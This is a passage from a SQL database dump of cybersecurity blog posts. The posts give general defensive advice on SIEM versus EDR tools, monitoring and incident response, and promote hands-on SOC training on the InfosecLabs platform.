[&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Comprehensive Disaster Recovery Plan</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Ensure rapid recovery after an incident, minimizing downtime.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Conduct Penetration Testing</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"6\">Periodically simulate attacks to identify and rectify vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 
[&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"7\"><b><strong class=\"font-bold\">Continuous Monitoring</strong></b>:</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"8\">Use tools like SIEM (e.g., Splunk) to detect, analyze, and respond to threats in real time.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Proactive Steps:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly update incident response plans.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Conduct quarterly cybersecurity audits.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Stay informed about emerging threats and trends.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Continuous Monitoring and Adaptation</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t a one-and-done deal. 
Threat actors constantly refine their tactics, forcing organizations to evolve their defenses.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Emerging Trends to Monitor:</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Rise of AI-driven cyberattacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Sophisticated ransomware models targeting critical infrastructure.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Deepfake technology introducing new phishing methods.</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Using advanced analytics tools like Darktrace to monitor for anomalies and foster collaboration among all departments can fortify an organization’s security posture.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The weakest link in any organization\'s cybersecurity framework often revolves around human factors. However, with the right combination of employee training, effective tools, and proactive policies, organizations can significantly reduce their risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For cybersecurity learners, it\'s essential to recognize vulnerabilities and explore practical solutions. 
Start by identifying gaps in your current framework and implementing these best practices.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"></p>', '', NULL, NULL, 1, 'draft', '2025-02-07 02:02:49', '2026-01-12 21:41:44', 'Information Security', 'Identifying and Mitigating Vulnerabilities in Organizational Cybersecurity', '', NULL),
(48, 'SIEM vs. EDR: Which Tools Matter Most in an Organization\'s Cybersecurity Framework?', 'siem-vs-edr-which-tools-matter-most-in-an-organizations-cybersecurity-framework', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is pivotal for modern organizations. With evolving threats, having the right tools in place is paramount. Among the array of cybersecurity solutions, SIEM (Security Information and Event Management) and EDR (Endpoint Detection and Response) have emerged as two essential tools that organizations rely on for detecting and responding to threats. But which one should you prioritize? And how do they complement each other? Let’s explore.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">What Are SIEM and EDR?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">SIEM (Security Information and Event Management):</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">SIEM solutions aggregate log data from across an organization’s IT ecosystem. Think of it as a “big-picture” tool that collects, correlates, and analyzes security information from various devices, applications, and systems. SIEM excels at providing real-time visibility into security events, enabling teams to pinpoint potential risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">EDR (Endpoint Detection and Response):</strong></b></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">EDR specifically focuses on monitoring and protecting individual devices or endpoints (e.g., workstations, servers, or mobile devices). 
It detects suspicious behaviors at the endpoint level and provides remediation capabilities to stop threats in their tracks. Consider it the \"frontline defender\" for your network.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">SIEM vs. EDR: Detecting and Responding to Security Threats</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Both tools play critical roles, but their functions and scopes differ:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Detection Capabilities:</strong></b> SIEM provides a centralized view of an organization’s security posture. It identifies threats by correlating data from multiple sources. EDR, on the other hand, detects threats that specifically target endpoints by analyzing device behaviors and patterns.</li>\r\n</ul>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Response Mechanisms:</strong></b> EDR empowers security teams to act quickly by isolating infected endpoints, removing malware, or rolling back systems to a safe state. 
SIEM aids response indirectly through comprehensive reporting, alerting, and forensic analysis, helping teams understand the broader context of an incident.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Scope:</strong></b> SIEM watches the entire network, while EDR zeroes in on individual devices. Together, they cover both the macro and micro levels of security monitoring.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How SIEM and EDR Work Together for Comprehensive Security</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While SIEM and EDR can be deployed independently, the real power is in their integration. When these tools work together, they create a holistic security ecosystem:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Threat Visibility:</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">EDR provides granular insights into endpoint activities, while SIEM correlates those insights with data from the broader IT infrastructure. 
For instance, if EDR detects a malware attack on an endpoint, SIEM can help trace the attack’s source or uncover related suspicious activities across the network.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Faster Incident Response:</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Integrated SIEM and EDR solutions allow security analysts to identify threats more quickly and respond with precision. While SIEM identifies anomalies and generates alerts, EDR offers containment and remediation options in real time.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Streamlined Workflows:</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Modern security tools often integrate via APIs, creating seamless workflows. Alerts generated by SIEM can be enriched with endpoint data from EDR, ensuring security teams have comprehensive details at their fingertips.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Integration Between SIEM and EDR Is Essential</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The evolving threat landscape requires organizations to take a unified approach to cybersecurity. Integration between SIEM and EDR is no longer a luxury—it’s a necessity. 
Here’s why:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Holistic Threat Defense:</strong></b> By combining the macro-level focus of SIEM with the micro-level precision of EDR, organizations can defend against a wider range of threats.</li>\r\n</ul>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Reduced Alert Fatigue:</strong></b> SIEM alone may generate a high volume of alerts, some of which may be false positives. EDR helps validate and prioritize these alerts, reducing noise for security teams.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Improved Resource Allocation:</strong></b> Integrated systems reduce redundancies and allow security teams to focus on high-priority issues, optimizing productivity.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Real-World Applications of SIEM and EDR</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Consider the following scenarios:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Scenario 1:</strong></b> A financial institution employs 
SIEM to monitor millions of daily transactions for anomalies while using EDR to protect employees’ devices from phishing attacks. Together, these tools help secure both the network and endpoints.</li>\r\n</ul>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Scenario 2:</strong></b> A healthcare organization integrates SIEM and EDR to protect sensitive patient data. When the SIEM detects unusual login patterns, the EDR isolates the potentially compromised endpoint, preventing further data breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Scenario 3:</strong></b> A tech startup uses both tools to meet compliance needs. 
SIEM provides audit trails for regulatory reporting, while EDR ensures endpoint security against potential vulnerabilities.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Choosing the Right Tool for Your Organization</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Selecting between SIEM and EDR—or deciding to deploy both—depends on your organization’s unique needs:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Focus on SIEM if:</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your organization requires broad visibility across the network, compliance reporting, and the ability to analyze security events from multiple sources.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Focus on EDR if:</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your priority is endpoint protection, quick containment of advanced persistent threats (APTs), and detailed forensics at the device level.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Choose Both if:</strong></b></li>\r\n</ul>\r\n<p class=\"text-body 
font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You’re looking for a balanced and comprehensive cybersecurity strategy that addresses both network-wide threats and endpoint-specific risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Critical considerations include your budget, IT environment complexity, and the maturity of your security operations center (SOC).</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Future Trends in SIEM and EDR Technologies</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity landscape is constantly evolving, and both SIEM and EDR technologies are moving toward smarter, more automated solutions:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Artificial Intelligence and Machine Learning:</strong></b> Both SIEM and EDR are leveraging AI to improve threat detection accuracy, automate responses, and provide predictive analytics.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">XDR (Extended Detection and Response):</strong></b> Combining the capabilities of SIEM, EDR, and other tools, XDR represents the future of integrated cybersecurity. 
It aims to deliver even greater visibility and unified threat management.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Cloud Integration:</strong></b> With more organizations moving to cloud environments, both SIEM and EDR are becoming optimized for detecting, managing, and preventing threats in hybrid and multi-cloud settings.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Zero Trust Architecture:</strong></b> SIEM and EDR are increasingly aligned with zero trust models, ensuring that no endpoint, user, or connection is inherently trusted.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The question isn’t whether SIEM or EDR is important—both are critical in safeguarding organizations against modern threats. While SIEM offers big-picture security visibility, EDR provides in-depth endpoint protection. Their integration enables a comprehensive defense strategy that covers every corner of your IT environment.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Deciding which tool to prioritize comes down to your organization’s unique needs, but in many cases, combining the strengths of both SIEM and EDR yields the best results. By investing in these technologies today, your organization can stay ahead of attackers and be better prepared to tackle the threats of tomorrow.</p>', '', NULL, NULL, 1, 'draft', '2025-02-04 05:00:17', '2026-01-12 21:41:44', 'Information Security', 'SIEM vs. EDR: Which Tools Matter Most in an Organization\'s Cybersecurity Framework?', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(49, 'Why Practice is Essential to Master Cybersecurity', 'why-practice-is-essential-to-master-cybersecurity', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Earning certifications is often the first step for aspiring cybersecurity professionals, but it’s not the final step. While certifications provide foundational knowledge, they don\'t guarantee hands-on experience or practical skills—the key elements employers prioritize when hiring candidates.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re preparing to enter the cybersecurity field or aiming to stand out in job interviews, it\'s important to move beyond theoretical learning to actual hands-on practice. Tools like the InfosecLabs SOC Environment are designed to help professionals bridge this critical gap, combining knowledge with practical application in a real-world environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Are Certifications Alone Not Enough?</h3>\r\n[caption id=\"attachment_4736\" align=\"alignright\" width=\"403\"]<img class=\"wp-image-4736\" src=\"https://infoseclabs.io/wp-content/uploads/2025/02/SoldierWithMedals.jpg\" alt=\"\" width=\"403\" height=\"266\" /> Cybersecurity Without Experience[/caption]\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Certifications act as benchmarks, verifying your knowledge of cybersecurity principles. But in a field as dynamic and high-stakes as cybersecurity, theoretical knowledge is no substitute for competence under pressure.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Think of it this way—earning a certification is like watching all the training videos for becoming a soldier and putting those to the LinkedIn profile. 
It doesn’t mean you’re ready for the operational challenges the job entails. Similarly, certifications in cybersecurity are stepping stones, not proof that you can analyze threats, manage incidents, or operate enterprise-level tools.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many candidates equipped with multiple certifications struggle to pass interviews, not because they lack knowledge, but because they can’t demonstrate real-world expertise. Employers hiring Security Operations Center (SOC) analysts—roles that often pay $70,000 to $80,000 annually—need candidates who inspire confidence in their ability to use tools effectively, respond to incidents swiftly, and solve problems seamlessly. For this reason, hands-on experience is indispensable.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Practical, Real-World Training</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Theoretical knowledge must be paired with practical training for you to effectively meet the demands of cybersecurity roles. That’s where platforms like the <b><strong class=\"font-bold\">InfosecLabs SOC Environment</strong></b> offer game-changing opportunities.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Unlike basic simulations, this platform lets you gain hands-on experience in a true SOC environment, working with the same tools that enterprise-level SOC analysts use every day.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Master Enterprise-Level Tools</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the InfosecLabs SOC Environment, you won’t be limited to theory. 
You’ll gain practical experience using tools like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Splunk</strong></b> and <b><strong class=\"font-bold\">Wazuh</strong></b> for security information and event management (SIEM)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">CrowdStrike</strong></b> for endpoint detection and response (EDR)</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Hive</strong></b> for incident tracking and project management</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">OpenCTI</strong></b> for the latest threat intelligence and artifacts</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Nessus</strong></b>, <b><strong class=\"font-bold\">OpenVAS</strong></b>, and <b><strong class=\"font-bold\">Acunetix</strong></b> for vulnerability scanning and management</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Through hands-on practice with these tools, you’ll master essential SOC operations such as incident response protocols, detailed communication processes, and day-to-day responsibilities of SOC analysts.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] 
[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of Hands-On Learning</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here’s how hands-on training benefits aspiring cybersecurity professionals like you:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Confidence to Handle Incidents</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Real-world practice builds confidence. By learning in an authentic SOC environment, you’re equipped to handle complex scenarios with ease.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Enhanced Competence</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Being proficient with enterprise tools allows you to apply your knowledge to real-world situations, increasing your ability to contribute value to any organization.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Preparation for High-Stakes Environments</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The cybersecurity field demands rapid responses to evolving challenges. 
